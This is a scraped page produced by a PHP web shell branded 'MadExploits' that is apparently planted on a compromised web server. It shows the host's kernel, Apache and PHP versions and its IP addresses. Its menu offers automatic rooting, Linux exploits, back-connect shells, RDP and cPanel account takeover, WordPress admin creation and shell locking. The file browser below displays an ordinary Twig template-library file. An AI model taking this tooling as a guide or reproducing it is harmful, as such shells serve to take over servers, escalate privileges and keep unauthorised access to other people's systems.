Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
lib /
Twig /
Node /
[ HOME SHELL ]
Name
Size
Permission
Action
Expression
[ DIR ]
drwxr-xr-x
AutoEscape.php
827
B
-rw-r--r--
Block.php
952
B
-rw-r--r--
BlockReference.php
796
B
-rw-r--r--
Body.php
332
B
-rw-r--r--
CheckSecurity.php
2.95
KB
-rw-r--r--
Do.php
725
B
-rw-r--r--
Embed.php
1.26
KB
-rw-r--r--
Expression.php
405
B
-rw-r--r--
Flush.php
617
B
-rw-r--r--
For.php
4.12
KB
-rw-r--r--
ForLoop.php
1.47
KB
-rw-r--r--
If.php
1.6
KB
-rw-r--r--
Import.php
1.29
KB
-rw-r--r--
Include.php
2.44
KB
-rw-r--r--
Macro.php
2.88
KB
-rw-r--r--
Module.php
13.81
KB
-rw-r--r--
Print.php
815
B
-rw-r--r--
Sandbox.php
1.12
KB
-rw-r--r--
SandboxedPrint.php
1.32
KB
-rw-r--r--
Set.php
3.06
KB
-rw-r--r--
Spaceless.php
849
B
-rw-r--r--
Text.php
753
B
-rw-r--r--
With.php
1.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Macro.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * Represents a macro node. * * @author Fabien Potencier <fabien@symfony.com> */ class Twig_Node_Macro extends Twig_Node { const VARARGS_NAME = 'varargs'; public function __construct($name, Twig_Node $body, Twig_Node $arguments, $lineno, $tag = null) { foreach ($arguments as $argumentName => $argument) { if (self::VARARGS_NAME === $argumentName) { throw new Twig_Error_Syntax(sprintf('The argument "%s" in macro "%s" cannot be defined because the variable "%s" is reserved for arbitrary arguments.', self::VARARGS_NAME, $name, self::VARARGS_NAME), $argument->getTemplateLine()); } } parent::__construct(array('body' => $body, 'arguments' => $arguments), array('name' => $name), $lineno, $tag); } public function compile(Twig_Compiler $compiler) { $compiler ->addDebugInfo($this) ->write(sprintf('public function macro_%s(', $this->getAttribute('name'))) ; $count = count($this->getNode('arguments')); $pos = 0; foreach ($this->getNode('arguments') as $name => $default) { $compiler ->raw('$__'.$name.'__ = ') ->subcompile($default) ; if (++$pos < $count) { $compiler->raw(', '); } } if ($count) { $compiler->raw(', '); } $compiler ->raw('...$__varargs__') ->raw(")\n") ->write("{\n") ->indent() ; $compiler ->write("\$context = \$this->env->mergeGlobals(array(\n") ->indent() ; foreach ($this->getNode('arguments') as $name => $default) { $compiler ->write('') ->string($name) ->raw(' => $__'.$name.'__') ->raw(",\n") ; } $compiler ->write('') ->string(self::VARARGS_NAME) ->raw(' => ') ; $compiler ->raw("\$__varargs__,\n") ->outdent() ->write("));\n\n") ->write("\$blocks = array();\n\n") ->write("ob_start();\n") ->write("try {\n") ->indent() ->subcompile($this->getNode('body')) ->raw("\n") ->write("return ('' === \$tmp = ob_get_contents()) ? '' : new Twig_Markup(\$tmp, \$this->env->getCharset());\n") ->outdent() ->write("} finally {\n") ->indent() ->write("ob_end_clean();\n") ->outdent() ->write("}\n") ->outdent() ->write("}\n\n") ; } }
Close